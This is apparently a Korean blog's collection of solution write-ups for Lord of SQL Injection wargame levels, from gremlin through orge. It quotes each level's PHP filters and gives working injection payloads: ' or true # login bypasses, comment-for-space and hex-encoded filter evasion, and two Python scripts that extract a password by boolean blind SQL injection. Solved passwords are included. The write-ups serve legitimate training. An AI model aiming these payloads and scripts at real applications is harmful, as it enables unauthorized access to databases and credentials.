그냥 블로그

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge"); 

정확한 pw값을 요구하는 문제이다 4번문제랑 동일하다.

특수문자 제약

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

and,or을 사용하지 못 한다. 4번문제 파이썬 코드에 ||,&&으로 바꾸기만 하면 해결된다.

Python code

import requests

URL='https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': 'p68istnh0anectj0ur6ttevv22'}
password = ''
length = 0;

for i in range(100):
    query={'pw': '\' || length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)
        length=i
        break;
    

for i in range(length):
    for j in range(ord('0'),ord('z')+1):
        query={'pw': '\' || substr(pw,'+str(i+1)+',1) = \'' + chr(j)+ '\'#'}
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

 4번문제랑 똑같다.

[LOS] orc 풀이 - 4번

URL

los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=7b751aec

solve 조건

if($result['id'] == 'admin') solve("darkelf"); 

 id값이 admin이면 해결된다.

특수문자 제약

if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

목표 SQL 쿼리

select id from prob_gremlin where id='' and pw='' || id = 'admin'

URL

los.rubiya.kr/chall/darkelf_c6a5ed64c4f6a7a5595c24977376136b.php?pw='  || id = 'admin 

solve 조건

if($result['id'] == 'admin') solve("wolfman"); 

id가 admin이면 해결된다

특수문자 제약

if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

 공백문자를 사용하지 못 한다. /**/로 우회한다.

SQLInjection 쿼리

select id from prob_gremlin where id='' and pw=''/**/or/**/id='admin 

 /**/을 공백대신 사용하였다

URL

los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw='/**/or/**/id='admin  

solve 조건

if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc");

정확한 pw값를 알아내야 해결할 수 있다.

Blind Injection

Blind Injection은 SQL Injection 공격 시 오류메세지가 출력되지 않을 때 참/거짓을 통해 원하는 DB 정보를 얻어내는 공격기법이다.

해당 문제에서는 블라인들 인젝션을 요구하고 있다.

먼저 참/거짓을 판단할 수 있는 구문을 탐색한다.

if($result['id']) echo "<h2>Hello admin</h2>"; 

 해당 구문을 보자 id값이 있기만하면 Hello admin을 출력해주고 있다. 이를 이용하여 참/거짓을 판단한다.

select id from prob_orc where id='admin' and pw='' or 수식

 id='admin' and pw='' 는 무조건 거짓이다 뒤 수식의 여부에따라 Hello admin을 출력해 줄것이다.

직접 하면 시간이 오래걸리니 Python Code로 작성한다.

길이알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(100):
    query={'pw': '\' or length(pw) = '+str(i)+' # '}
    res=requests.get(URL, params=query, headers=headers, cookies=cookies)
    if('Hello admin' in res.text):
        print(i)

select id from prob_orc where id='admin' and pw='' or length(pw) = 숫자

해당 쿼리문을 넘겨주는 파이썬 코드이다. length(pw) = 숫자가 참이라면 Hello admin을 출력할 것이다. 

4와 8을 출력한다. pw의 길이는 4와 8중에 하나이다

pw알아내기

import requests

URL='https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php'
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'PHPSESSID': '내쿠기값'}
password = ''

for i in range(8):
    for  j in range(ord('0'),ord('z')+1):
        query={'pw': '\' or substr(pw,'+str(i+1)+',1) = \'' + chr(j) + '\'#' }
        res=requests.get(URL, params=query, headers=headers, cookies=cookies)
        if('Hello admin' in res.text):
            password = password + chr(j)
            print(password)
            break;

select id from prob_orc where id='admin' and pw='' or substr(pw,n번째문자,1)

길이를 8로해서 돌렸다. substr은 문자열을 분리하여 원하는 위치에 문자열을 가져오게 해준다.

 095A9852 값이 나왔다.

 A값이 소문자로 입력해야 정답으로 인정되는데 원인을 아직 모르겠다.

URL

los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=095a9852

solve 조건

 if($result['id'] == 'admin') solve("goblin");

 id가 admin이면 해결된다.

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); 

 쿼터 문자들을 필터링한다. 

sqlInjection 쿼리

select id from prob_gremlin where id='' and pw='' or true #'

 형태로 공격을 시도 할 것이다.

 해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.

admin=0x61646d696e

URL

?no=-1 or admin=0x61646d696e

Injection 결과

select id from prob_goblin where id='guest' and no=123 or id=0x61646d696e

solve 조건

if($result['id'] == 'admin') solve("cobolt");

 id값이 admin 이여야한다

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

[prob, _ ,.\] 문자들이 필터링 된다 해당 문자들을 제외하고 sql 인젝션을 시도한다.

sqlInjection 쿼리

 $query = "select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')"; 

 id값만 admin으로 넣어주고 뒤에는 주석처리 하면 될것같다.

URL

?id= admin& pw=' or true %23 

Injection 결과

select id from prob_gremlin where id=' admin' and pw='' or true #' 

solve 조건

  if($result['id']) solve("gremlin");

id값이 있기만하면 문제가 해결된다.

특수문자 제약

 if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~"); 
 if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");

[prob, _ ,.\] 문자들이 필터링 된다 해당 문자들을 제외하고 sql 인젝션을 시도한다.

sqlInjection 쿼리

select id from prob_gremlin where id='' and pw='' or true #'

 형태로 공격을 시도 할 것이다.

 해당 php는 get형식으로 쿼리를 받고있어 sql 인젝션이 가능하다.

URL

los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?pw=' or true %23 

Injection 결과

select id from prob_gremlin where id='' and pw='' or true #' 

#이 주석역활을 하기 때문에 SQL에서는

select id from prob_gremlin where id='' and pw='' or true 으로 인식한다.